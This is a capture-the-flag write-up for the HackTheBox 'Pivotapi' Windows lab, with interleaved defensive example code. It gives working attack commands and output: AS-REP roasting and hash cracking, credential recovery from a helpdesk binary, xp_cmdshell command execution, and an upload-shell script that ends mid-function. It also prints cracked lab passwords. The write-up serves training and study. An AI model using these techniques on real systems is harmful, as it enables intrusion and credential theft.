
Hackthebox Pivotapi writeup

Introduction@Pivotapi:~$

Name        Pivotapi
IP          10.10.10.240
Points      50
OS          Windows
Difficulty  Insane
Creator     CyberVaca & 3v4Si0N
Out on      08 May 2021


Recon

Nmap

┌───[us-free-1]─[10.10.14.3]─[root@parrot]─[~/Desktop/HTB/pivotapi]
└──╼ [★]$ nmap -sC -sV -oA nmap/result 10.10.10.240
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-12 23:11 CDT
Nmap scan report for 10.10.10.240
Host is up (0.084s latency).
Not shown: 986 filtered ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-19-21  03:06PM               103106 10.1.1.414.6453.pdf
| 02-19-21  03:06PM               656029 28475-linux-stack-based-buffer-overflows.pdf
| 02-19-21  12:55PM              1802642 BHUSA09-McDonald-WindowsHeap-PAPER.pdf
| 02-19-21  03:06PM              1018160 ExploitingSoftware-Ch07.pdf
| 08-08-20  01:18PM               219091 notes1.pdf
| 08-08-20  01:34PM               279445 notes2.pdf
| 08-08-20  01:41PM                  105 README.txt
|_02-19-21  03:06PM              1301120 RHUL-MA-2009-06.pdf
| ftp-syst:
|_  SYST: Windows_NT
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
|   3072 fa:19:bb:8d:b6:b6:fb:97:7e:17:80:f5:df:fd:7f:d2 (RSA)
|   256 44:d0:8b:cc:0a:4e:cd:2b:de:e8:3a:6e:ae:65:dc:10 (ECDSA)
|_  256 93:bd:b6:e2:36:ce:72:45:6c:1d:46:60:dd:08:6a:44 (ED25519)
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-05-13 04:12:09Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: LicorDeBellota.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
|   Target_Name: LICORDEBELLOTA
|   NetBIOS_Domain_Name: LICORDEBELLOTA
|   NetBIOS_Computer_Name: PIVOTAPI
|   DNS_Domain_Name: LicorDeBellota.htb
|   DNS_Computer_Name: PivotAPI.LicorDeBellota.htb
|   DNS_Tree_Name: LicorDeBellota.htb
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-05-13T04:06:57
|_Not valid after:  2051-05-13T04:06:57
|_ssl-date: 2021-05-13T04:12:54+00:00; +3s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: LicorDeBellota.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: PIVOTAPI; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2s, deviation: 0s, median: 2s
| ms-sql-info:
|   10.10.10.240:1433:
|     Version:
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2021-05-13T04:12:17
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.05 seconds

There are a bunch of ports open.

Let's start with FTP.

FTP

There are a lot of PDF files.

┌───[us-free-1]─[10.10.14.5]─[root@parrot]─[~/Desktop/HTB/pivotapi/ftp]
└──╼ [★]$ ftp -pi 10.10.10.240
Connected to 10.10.10.240.
220 Microsoft FTP Service
Name (10.10.10.240:dedsec): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
227 Entering Passive Mode (10,10,10,240,202,100).
125 Data connection already open; Transfer starting.
02-19-21  03:06PM               103106 10.1.1.414.6453.pdf
02-19-21  03:06PM               656029 28475-linux-stack-based-buffer-overflows.pdf
02-19-21  12:55PM              1802642 BHUSA09-McDonald-WindowsHeap-PAPER.pdf
02-19-21  03:06PM              1018160 ExploitingSoftware-Ch07.pdf
08-08-20  01:18PM               219091 notes1.pdf
08-08-20  01:34PM               279445 notes2.pdf
08-08-20  01:41PM                  105 README.txt  
02-19-21  03:06PM              1301120 RHUL-MA-2009-06.pdf
226 Transfer complete.
ftp> mget *

Let's first cat the README.txt file.

It says to switch the download mode to binary so that no files get corrupted.

Let's download all the files again in binary mode.

┌───[us-free-1]─[10.10.14.5]─[root@parrot]─[~/Desktop/HTB/pivotapi/ftp]
└──╼ [★]$ ftp -pi 10.10.10.240
Connected to 10.10.10.240.
220 Microsoft FTP Service
Name (10.10.10.240:dedsec): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
227 Entering Passive Mode (10,10,10,240,202,149).
150 Opening ASCII mode data connection.
02-19-21  03:06PM               103106 10.1.1.414.6453.pdf
02-19-21  03:06PM               656029 28475-linux-stack-based-buffer-overflows.pdf
02-19-21  12:55PM              1802642 BHUSA09-McDonald-WindowsHeap-PAPER.pdf
02-19-21  03:06PM              1018160 ExploitingSoftware-Ch07.pdf
08-08-20  01:18PM               219091 notes1.pdf
08-08-20  01:34PM               279445 notes2.pdf
08-08-20  01:41PM                  105 README.txt
02-19-21  03:06PM              1301120 RHUL-MA-2009-06.pdf
226 Transfer complete.
ftp> binary
200 Type set to I.
ftp> mget *

After analysing all the files I found nothing, so let's check the metadata of one of the files with exiftool.

We found a username. Let's collect the usernames from every file.

┌───[us-free-1]─[10.10.14.5]─[root@parrot]─[~/Desktop/HTB/pivotapi/ftp]
└──╼ [★]$ exiftool * | egrep -i "Creator|Author" | awk '{print $3}'
Microsoft
Unknown
saif
Microsoft®
byron
:
byron
cairo
Kaorz
:
alex
alex

Let's save all these usernames into a file called user.lst.

┌───[us-free-1]─[10.10.14.5]─[root@parrot]─[~/Desktop/HTB/pivotapi]
└──╼ [★]$ cat user.lst 
Microsoft
Unknown
saif
Microsoft®
byron
byron
cairo
Kaorz
alex
alex
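The awk '{print $3}' pipeline above only prints the third whitespace-separated field, which is why the list contains ":" entries (tags with a space in their name, such as "Creator Tool") and vendor strings like "Microsoft®". The following added example (not part of the original post) parses exiftool's multi-file output properly and is equally useful from the other side: run it over documents before they are published to see which files leak account names. The sample output, file names and values are constructed for the example.

```python
import re

# Constructed sample of `exiftool *` output over three files. The tag names are
# exiftool's; the file names and values are invented and are not the box's metadata.
SAMPLE_EXIFTOOL_OUTPUT = """\
======== notes1.pdf
File Name                       : notes1.pdf
Creator Tool                    : Microsoft® Word 2013
Creator                         : Microsoft® Word 2013
Author                          : byron
======== notes2.pdf
File Name                       : notes2.pdf
Creator                         : Writer
Author                          : Kaorz
Last Modified By                : byron
======== README.txt
File Name                       : README.txt
File Type                       : TXT
    3 image files read
"""

# Tags whose value is usually a person rather than a product.
AUTHOR_TAGS = ("Author", "Creator", "Last Modified By")

# Product or vendor strings that show up in Creator/Author but are not accounts.
VENDOR_NOISE = {"microsoft", "microsoft\u00ae", "unknown", "writer", "adobe", "acrobat"}

# "Tag Name   : value" lines. The tag may itself contain spaces ("Creator Tool"),
# which is exactly why `awk '{print $3}'` prints ":" for such lines.
TAG_RE = re.compile(r"^(?P<tag>[A-Za-z][A-Za-z0-9 /]*?)\s*:\s*(?P<value>.*)$")


def parse_exiftool(text):
    """Return (file, tag, value) tuples from exiftool's multi-file output,
    where each file's block starts with a '======== <file>' separator."""
    records = []
    current_file = None
    for line in text.splitlines():
        if line.startswith("======== "):
            current_file = line[len("======== "):].strip()
            continue
        m = TAG_RE.match(line)
        if m and current_file is not None:
            records.append((current_file, m.group("tag"), m.group("value").strip()))
    return records


def looks_like_username(value):
    """Single token, not a known vendor/product string, only account-name characters."""
    if not value or " " in value:          # "Microsoft® Word 2013" is a product, not a user
        return False
    if value.lower() in VENDOR_NOISE:
        return False
    return value.replace("_", "").replace("-", "").isalnum()


def candidate_usernames(text, tags=AUTHOR_TAGS):
    """Unique author-like values in first-seen order, vendor strings removed."""
    seen = []
    for _file, tag, value in parse_exiftool(text):
        if tag in tags and looks_like_username(value) and value not in seen:
            seen.append(value)
    return seen


def files_leaking_names(text, tags=AUTHOR_TAGS):
    """Map each file to the account names its metadata exposes (pre-publication check)."""
    leaks = {}
    for file_name, tag, value in parse_exiftool(text):
        if tag in tags and looks_like_username(value):
            leaks.setdefault(file_name, set()).add(value)
    return leaks


if __name__ == "__main__":
    print(candidate_usernames(SAMPLE_EXIFTOOL_OUTPUT))
    for name, users in sorted(files_leaking_names(SAMPLE_EXIFTOOL_OUTPUT).items()):
        print(name, sorted(users))
```

On the sample this yields byron and Kaorz and attributes them to the two PDFs; README.txt carries no author tag and is not reported. The same names fed into the pre-auth check below are exactly what a defender would want to strip (exiftool -all= on the files) before they reach an anonymous FTP share.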

Now that we have the user list, let's check which of these accounts have Kerberos pre-authentication disabled.

┌───[us-free-1]─[10.10.14.5]─[root@parrot]─[~/Desktop/HTB/pivotapi]
└──╼ [★]$ GetNPUsers.py -dc-ip 10.10.10.240 -no-pass -usersfile user.lst LicorDeBellota/
Impacket v0.9.23.dev1+20210416.153120.efbe78bb - Copyright 2020 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
$krb5asrep$23$Kaorz@LICORDEBELLOTA:27b3349940bbeb5a2c96374dc1e4e25b$ddd8d8991d1461c49db16544b9f6b9319dba02124d8949b8d6952168d6e42fa2b7604392e2f90424b2b2608acc5e1ef80d75b830a0775701ab7360831acf0a7ba59fe0169ca031cd8619939f40c7456264a14fcb53599b9308e976ac4792d678913a56b6cf59dac1c3d35ee1213b16b74117b73ba63c3d3c5270ae974d47cbd908ef3531e641bdb0d165f61288a24a000b5c099f1331cf32b94a4f0a3c8ae295ed71be38be1a90fec0e801337d188d0a23218b18abc87d535b34872dc5d3cb0f74783e997bee4bbe089e83a61951928f54c58b616ded955da935b839d9ef0b5c5a6a204bd87961273e4b7a2ad9ad4037825ca2e7
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
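GetNPUsers.py only gets a crackable AS-REP for Kaorz because that account has the DONT_REQ_PREAUTH bit (0x400000) set in its userAccountControl attribute; the other names are simply not domain accounts. The following added example (not from the original post or from Impacket) shows the audit a domain admin would run to find such accounts: it decodes the bitmask, lists enabled accounts with pre-auth disabled, and shows the server-side LDAP filter that matches the same set. The account records are constructed for the example.

```python
# Selected userAccountControl bits (Microsoft's documented UF_* constants).
UAC_FLAGS = {
    "ACCOUNTDISABLE":         0x0002,
    "PASSWD_NOTREQD":         0x0020,
    "NORMAL_ACCOUNT":         0x0200,
    "DONT_EXPIRE_PASSWORD":   0x10000,
    "TRUSTED_FOR_DELEGATION": 0x80000,
    "DONT_REQ_PREAUTH":       0x400000,
}

# LDAP filter returning the same accounts directly from a domain controller;
# 1.2.840.113556.1.4.803 is the bitwise-AND matching rule and 4194304 == 0x400000.
ASREP_ROASTABLE_FILTER = (
    "(&(objectCategory=person)(objectClass=user)"
    "(userAccountControl:1.2.840.113556.1.4.803:=4194304))"
)

# Constructed directory records (sAMAccountName, userAccountControl); not real data.
SAMPLE_ACCOUNTS = [
    ("Kaorz",   0x200 | 0x400000),        # normal account, pre-auth disabled
    ("alex",    0x200),                   # normal account
    ("byron",   0x200 | 0x10000),         # password never expires, pre-auth required
    ("svc_old", 0x200 | 0x400000 | 0x2),  # pre-auth disabled but account disabled
]


def decode_uac(value):
    """Names of the known flags set in a userAccountControl value."""
    return {name for name, bit in UAC_FLAGS.items() if value & bit}


def asrep_roastable(accounts):
    """Accounts the KDC will answer with an encrypted AS-REP without any password:
    pre-auth disabled and the account still enabled."""
    hits = []
    for sam, uac in accounts:
        flags = decode_uac(uac)
        if "DONT_REQ_PREAUTH" in flags and "ACCOUNTDISABLE" not in flags:
            hits.append(sam)
    return hits


def with_preauth_required(value):
    """The userAccountControl value an admin writes back to fix the finding."""
    return value & ~UAC_FLAGS["DONT_REQ_PREAUTH"]


if __name__ == "__main__":
    for sam in asrep_roastable(SAMPLE_ACCOUNTS):
        print("pre-auth disabled:", sam)
    print("LDAP filter:", ASREP_ROASTABLE_FILTER)
```

Beyond the audit, the KDC records a ticket request with pre-authentication type 0 as event ID 4768 on the domain controller, so a detection rule on that field catches the enumeration step shown above regardless of which tool performed it.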

We got the AS-REP hash of the Kaorz user; let's try to crack it with john.

┌───[us-free-1]─[10.10.14.5]─[root@parrot]─[~/Desktop/HTB/pivotapi]
└──╼ [★]$ vim hash
┌───[us-free-1]─[10.10.14.5]─[root@parrot]─[~/Desktop/HTB/pivotapi]
└──╼ [★]$ john hash -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Roper4155        ($krb5asrep$23$Kaorz@LICORDEBELLOTA)
1g 0:00:00:11 DONE (2021-05-12 23:39) 0.08517g/s 908865p/s 908865c/s 908865C/s Roybel01..Ronald8
Use the "--show" option to display all of the cracked passwords reliably
Session completed

We have the username and the password Roper4155; let's check whether we have access to any SMB shares.

I use crackmapexec for that.

┌───[us-free-1]─[10.10.14.5]─[root@parrot]─[~/Desktop/HTB/pivotapi]
└──╼ [★]$ crackmapexec smb 10.10.10.240 -u Kaorz -p Roper4155 --shares
SMB         10.10.10.240    445    PIVOTAPI         [*] Windows 10.0 Build 17763 x64 (name:PIVOTAPI) (domain:LicorDeBellota.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.240    445    PIVOTAPI         [+] LicorDeBellota.htb\Kaorz:Roper4155 
SMB         10.10.10.240    445    PIVOTAPI         [+] Enumerated shares
SMB         10.10.10.240    445    PIVOTAPI         Share           Permissions     Remark
SMB         10.10.10.240    445    PIVOTAPI         -----           -----------     ------
SMB         10.10.10.240    445    PIVOTAPI         ADMIN$                          Admin remota
SMB         10.10.10.240    445    PIVOTAPI         C$                              Recurso predeterminado
SMB         10.10.10.240    445    PIVOTAPI         IPC$            READ            IPC remota
SMB         10.10.10.240    445    PIVOTAPI         NETLOGON        READ            Recurso compartido del servidor de inicio de sesión 
SMB         10.10.10.240    445    PIVOTAPI         SYSVOL          READ            Recurso compartido del servidor de inicio de sesión 

We have read access to three shares. Let's check NETLOGON first.

┌───[us-free-1]─[10.10.14.5]─[root@parrot]─[~/Desktop/HTB/pivotapi/HelpDesk]
└──╼ [★]$ smbclient //10.10.10.240/NETLOGON -U kaorz%Roper4155 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Aug  8 05:42:28 2020
  ..                                  D        0  Sat Aug  8 05:42:28 2020
  HelpDesk                            D        0  Sun Aug  9 10:40:36 2020

                7779839 blocks of size 4096. 3497512 blocks available
smb: \> cd HelpDesk
smb: \HelpDesk\> ls
  .                                   D        0  Sun Aug  9 10:40:36 2020
  ..                                  D        0  Sun Aug  9 10:40:36 2020
  Restart-OracleService.exe           A  1854976  Fri Feb 19 04:52:01 2021
  Server MSSQL.msg                    A    24576  Sun Aug  9 06:04:14 2020
  WinRM Service.msg                   A    26112  Sun Aug  9 06:42:20 2020

                7779839 blocks of size 4096. 3497512 blocks available

We have three files in the HelpDesk directory; let's get all of them onto our system.

smb: \HelpDesk\> get Restart-OracleService.exe
getting file \HelpDesk\Restart-OracleService.exe of size 1854976 as Restart-OracleService.exe (338.5 KiloBytes/sec) (average 338.5 KiloBytes/sec)
smb: \HelpDesk\> get "Server MSSQL.msg"
getting file \HelpDesk\Server MSSQL.msg of size 24576 as Server MSSQL.msg (67.6 KiloBytes/sec) (average 321.7 KiloBytes/sec)
smb: \HelpDesk\> get "WinRM Service.msg"
getting file \HelpDesk\WinRM Service.msg of size 26112 as WinRM Service.msg (71.8 KiloBytes/sec) (average 307.0 KiloBytes/sec)
smb: \HelpDesk\> ^C
┌───[us-free-1]─[10.10.14.5]─[root@parrot]─[~/Desktop/HTB/pivotapi/HelpDesk]
└──╼ [★]$ ls
 Restart-OracleService.exe  'Server MSSQL.msg'  'WinRM Service.msg'

To extract the text inside the .msg files we need msgconvert, so let's install it first.

sudo apt-get install libemail-outlook-message-perl libemail-sender-perl

Now let's extract the text from the .msg files.

msgconvert Server\ MSSQL.msg

Server MSSQL.msg

Date: Sun, 09 Aug 2020 11:04:14 +0000
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary=16208820270.2cBBDf6.24456
Content-Transfer-Encoding: 7bit
Subject: Server MSSQL
To: cybervaca@licordebellota.htb <cybervaca@licordebellota.htb>

Good afternoon,
Due to the problems caused by the Oracle database installed in 2010 in Windows, it has been decided to migrate to MSSQL at the beginning of 2020.
Remember that there were problems at the time of restarting the Oracle service and for this reason a program called "Reset-Service.exe" was created to log in to Oracle and restart the service.
 
Any doubt do not hesitate to contact us.
Greetings,
The HelpDesk Team

WinRM Service.msg

Date: Sun, 09 Aug 2020 11:42:20 +0000
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary=16208825850.f7f5B6.27939
Content-Transfer-Encoding: 7bit
Subject: WinRM Service
To: helpdesk@licordebellota.htb <helpdesk@licordebellota.htb>

Good afternoon. 
After the last pentest, we have decided to stop externally displaying WinRM's service. Several of our employees are the creators of Evil-WinRM so we do not want to expose this service... We have created a rule to block the exposure of the service and we have also blocked the TCP, UDP and even ICMP output (So that no shells of the type icmp are used.)
Greetings,

The HelpDesk Team

After reading both messages I know that, because of problems with the Oracle database installed in 2010, they migrated to MSSQL at the beginning of 2020.

They also say there were problems restarting the Oracle service, and for that reason a program called "Reset-Service.exe" was created to log in to Oracle and restart the service.

That means "Reset-Service.exe" must contain credentials for the Oracle database, because it needs to log in to Oracle and cannot do that without them.

The other message says they stopped exposing the WinRM service externally, created a rule to block it, and also blocked outbound TCP, UDP and even ICMP so that no ICMP-type shells can be used.

Now let's go to my Commando-VM and analyse the binary.

I have already transferred the binary to my Commando-VM.

First let's monitor the binary with procmon so we know what it is doing.

If you analyse the output you find that the binary creates a .bat file with a random name inside the "AppData\Local\Temp\" directory every time it runs, and then deletes that .bat file.

So to get that random .bat file we need to stop the binary before it deletes it; for that I use CMDWatcher.

Link : CMD Watcher

Select interactive mode, start monitoring, then execute the binary.

Click to resume the process.

You get the .bat file location; open that location in your file manager.

Copy both files to a folder on your desktop.

I copied both files into my desktop/files folder and then resumed the process.

Now let's analyse the .bat file.

The .bat file contains encrypted text which it writes to c:\programdata\oracle.txt; a for loop then reads that file, strips the spaces and writes the result out as the restart-service.exe binary, and finally deletes all the files, including restart-service.exe.

We need that restart-service.exe because it contains the credentials for the Oracle DB.

So we need to edit the .bat file so that it does not delete any file or binary.

Step 1

Remove all these if statements.

And add "goto correcto".

Step 2

Now, at the bottom of the file, remove these del statements.

After removing the del statements it looks like this.

Now we are good to go: open a cmd and run the .bat file to create restart-service.exe.

COMMANDO Fri 05/14/2021  7:41:07.78
C:\Users\DEDSEC\Desktop\files>dir
 Volume in drive C has no label.
 Volume Serial Number is 7EAC-CBDE

 Directory of C:\Users\DEDSEC\Desktop\files

05/14/2021  07:25 AM    <DIR>          .
05/14/2021  07:25 AM    <DIR>          ..
05/14/2021  07:39 AM         1,729,970 542B.bat
05/14/2021  07:22 AM                 0 542C.tmp
               2 File(s)      1,729,970 bytes
               2 Dir(s)  113,196,924,928 bytes free

COMMANDO Fri 05/14/2021  7:41:09.00
C:\Users\DEDSEC\Desktop\files>.\542B.bat
COMMANDO Fri 05/14/2021  7:41:59.20
C:\Users\DEDSEC\Desktop\files>

Now let's check whether restart-service.exe was created.

And we got restart-service.exe. I use API Monitor to analyse this binary.

Link : API Monitor

Check all the API filters on the left side.

Now click on "monitor new process" and select the binary restart-service.exe.

Now that we have captured all of the process's API calls, let's analyse them.

Found the username and password.

#Time of Day Thread Module API Return Value Error Duration
CreateProcessWithLogonW ( "svc_oracle", "", "#oracle_s3rV1c3!2010", 0, NULL, ""c:\windows\system32\cmd.exe" /c sc.exe stop OracleServiceXE; sc.exe start OracleServiceXE", 0, NULL, "C:\ProgramData", 0x000000000234e120, 0x0000000003f61c68 )  FALSE   1326 = The user name or password is incorrect.

svc_oracle:#oracle_s3rV1c3!2010

Now, if you look at the nmap result, there is an MSSQL port open; let's try to connect to it.

┌───[us-free-1]─[10.10.14.3]─[root@parrot]─[~/Desktop/HTB/pivotapi]
└──╼ [★]$ mssqlclient.py -port 1433 svc_oracle@10.10.10.240
Impacket v0.9.23.dev1+20210416.153120.efbe78bb - Copyright 2020 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[-] ERROR(PIVOTAPI\SQLEXPRESS): Line 1: Login failed for user 'svc_oracle'.

Login failed! That means the username and password are not correct.

After that I read Server MSSQL.msg again and realised that they are now using MSSQL, not Oracle, so we need to change the password from #oracle_s3rV1c3!2010 to #mssql_s3rV1c3!2020, because they migrated to MSSQL at the beginning of 2020.

For the username I searched Google for the default MSSQL username and found that it is sa.

So now the creds are sa:#mssql_s3rV1c3!2020; let's try to log in with them.

┌───[us-free-1]─[10.10.14.3]─[root@parrot]─[~/Desktop/HTB/pivotapi]
└──╼ [★]$ mssqlclient.py -port 1433 sa@10.10.10.240
Impacket v0.9.23.dev1+20210416.153120.efbe78bb - Copyright 2020 SecureAuth Corporation

Password:
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: Español
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió el contexto de la base de datos a 'master'.
[*] INFO(PIVOTAPI\SQLEXPRESS): Line 1: Se cambió la configuración de idioma a Español.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL> help

     lcd {path}                 - changes the current local directory to {path}
     exit                       - terminates the server process (and this session)
     enable_xp_cmdshell         - you know what it means
     disable_xp_cmdshell        - you know what it means
     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
     ! {cmd}                    - executes a local shell cmd
     
SQL> 

If we type help we can see that we can execute commands with xp_cmdshell {cmd}; let's try that.

SQL> xp_cmdshell whoami
output                                                                             

--------------------------------------------------------------------------------   

nt service\mssql$sqlexpress                                                        

NULL                                                                               

SQL> 

We can execute commands; let's check which privileges we have.

SQL> xp_cmdshell whoami /priv
output                                                                             

--------------------------------------------------------------------------------   

NULL                                                                               

INFORMACIÓN DE PRIVILEGIOS                                                         

--------------------------                                                         

NULL                                                                               

Nombre de privilegio          Descripción                                       Estado          

============================= ================================================= =============   

SeAssignPrimaryTokenPrivilege Reemplazar un símbolo (token) de nivel de proceso Deshabilitado   

SeIncreaseQuotaPrivilege      Ajustar las cuotas de la memoria para un proceso  Deshabilitado   

SeMachineAccountPrivilege     Agregar estaciones de trabajo al dominio          Deshabilitado   

SeChangeNotifyPrivilege       Omitir comprobación de recorrido                  Habilitada      

SeManageVolumePrivilege       Realizar tareas de mantenimiento del volumen      Habilitada      

SeImpersonatePrivilege        Suplantar a un cliente tras la autenticación      Habilitada      

SeCreateGlobalPrivilege       Crear objetos globales                            Habilitada      

SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso      Deshabilitado   

NULL                                                                               

SQL> 

The output is in Spanish (the session language was set to Español at login), so let's translate it.

Privilege name                Description                                       State
============================= ================================================= =============
SeAssignPrimaryTokenPrivilege Replace a process-level token                     Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process                Disabled
SeMachineAccountPrivilege     Add workstations to the domain                    Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                          Enabled
SeManageVolumePrivilege       Perform volume maintenance tasks                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication         Enabled
SeCreateGlobalPrivilege       Create global objects                             Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set                    Disabled

We have SeImpersonatePrivilege enabled; let's try privilege escalation with it.
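The privilege table is the key finding here, and on a localized host it is easy to misread. The following added example (not from the original post) parses whoami /priv output regardless of locale, by taking the first token as the privilege name and the last token as its state, and reports the enabled privileges that allow a service account to escalate on its own. Both samples are constructed: the Spanish one mirrors the layout of the output above, the English one is what the same command prints on an English-locale host.

```python
# Constructed `whoami /priv` output from a Spanish-locale host (same layout as the
# page's output, shortened); not a capture from the box.
SAMPLE_PRIV_ES = """\
INFORMACIÓN DE PRIVILEGIOS
--------------------------

Nombre de privilegio          Descripción                                       Estado
============================= ================================================= =============
SeAssignPrimaryTokenPrivilege Reemplazar un símbolo (token) de nivel de proceso Deshabilitado
SeChangeNotifyPrivilege       Omitir comprobación de recorrido                  Habilitada
SeImpersonatePrivilege        Suplantar a un cliente tras la autenticación      Habilitada
SeCreateGlobalPrivilege       Crear objetos globales                            Habilitada
"""

# The same command on an English-locale host (constructed).
SAMPLE_PRIV_EN = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeDebugPrivilege              Debug programs                            Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Disabled
"""

# Privileges whose holder can obtain SYSTEM without any further vulnerability.
HIGH_RISK = {
    "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege", "SeDebugPrivilege",
    "SeTcbPrivilege", "SeCreateTokenPrivilege", "SeLoadDriverPrivilege",
    "SeBackupPrivilege", "SeRestorePrivilege", "SeTakeOwnershipPrivilege",
}

# State words in the locales this example knows about (English and Spanish).
ENABLED_WORDS = {"enabled", "habilitada", "habilitado"}
DISABLED_WORDS = {"disabled", "deshabilitada", "deshabilitado"}


def parse_whoami_priv(text):
    """Map privilege name -> True (enabled) / False (disabled).

    Header and separator lines never start with 'Se…Privilege', so the filter on the
    first token skips them in every locale; the state is always the last column."""
    privs = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue
        name, state = parts[0], parts[-1].lower()
        if not (name.startswith("Se") and name.endswith("Privilege")):
            continue
        if state in ENABLED_WORDS:
            privs[name] = True
        elif state in DISABLED_WORDS:
            privs[name] = False
    return privs


def enabled_high_risk(text):
    """Sorted list of enabled privileges from HIGH_RISK; non-empty means the account
    running this shell can escalate to SYSTEM by itself."""
    privs = parse_whoami_priv(text)
    return sorted(p for p, on in privs.items() if on and p in HIGH_RISK)


if __name__ == "__main__":
    print("ES host:", enabled_high_risk(SAMPLE_PRIV_ES))
    print("EN host:", enabled_high_risk(SAMPLE_PRIV_EN))
```

The defensive reading of the result is that the escalation which follows needs two things at once: xp_cmdshell enabled for sa, and the SQL Server service account holding SeImpersonatePrivilege. Keeping xp_cmdshell disabled (sp_configure 'xp_cmdshell', 0) and alerting on a whoami /priv or child process spawned by sqlservr.exe closes both halves, independent of which impersonation tool is used.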

Link : PrintSpoofer

But the problem is that we can't transfer the file directly, because the firewall blocks all outbound connections.

So I searched Google for a script that logs in to MSSQL and can also upload files through it, and I found a Python script.

Link : Mssql_Shell.py

I edited the script because it breaks when we use the UPLOAD command.

#!/usr/bin/env python
# mssql_shell.py (Alamot's script, edited): a pseudo-shell over xp_cmdshell with an
# UPLOAD command that sends a local file as base64 chunks through echo and decodes
# it server-side with certutil, so it works even when the target cannot make any
# outbound connection.
from __future__ import print_function
import base64
import hashlib
import shlex
import sys
import tqdm
try:
    import _mssql                  # pymssql < 2.2 exposes it as a top-level module
except ImportError:
    from pymssql import _mssql     # pymssql >= 2.2
try:
    input = raw_input              # Python 2 compatibility
except NameError:
    pass

MSSQL_SERVER = "10.10.10.240"
MSSQL_USERNAME = "sa"
MSSQL_PASSWORD = "#mssql_s3rV1c3!2020"
BUFFER_SIZE = 5 * 1024             # base64 characters per echo, well under cmd's line limit
TIMEOUT = 30


def process_result(mssql):
    """Print the command output and return (username, computername, cwd).

    Every command is suffixed with 'echo %username%^|%COMPUTERNAME% & cd', so the
    last three rows are 'user|host', the current directory and a trailing NULL."""
    username = ""
    computername = ""
    cwd = ""
    rows = list(mssql)
    for row in rows[:-3]:
        columns = list(row)
        if row[columns[-1]]:
            print(row[columns[-1]])
        else:
            print()
    if len(rows) >= 3:
        (username, computername) = rows[-3][list(rows[-3])[-1]].split('|')
        cwd = rows[-2][list(rows[-2])[-1]]
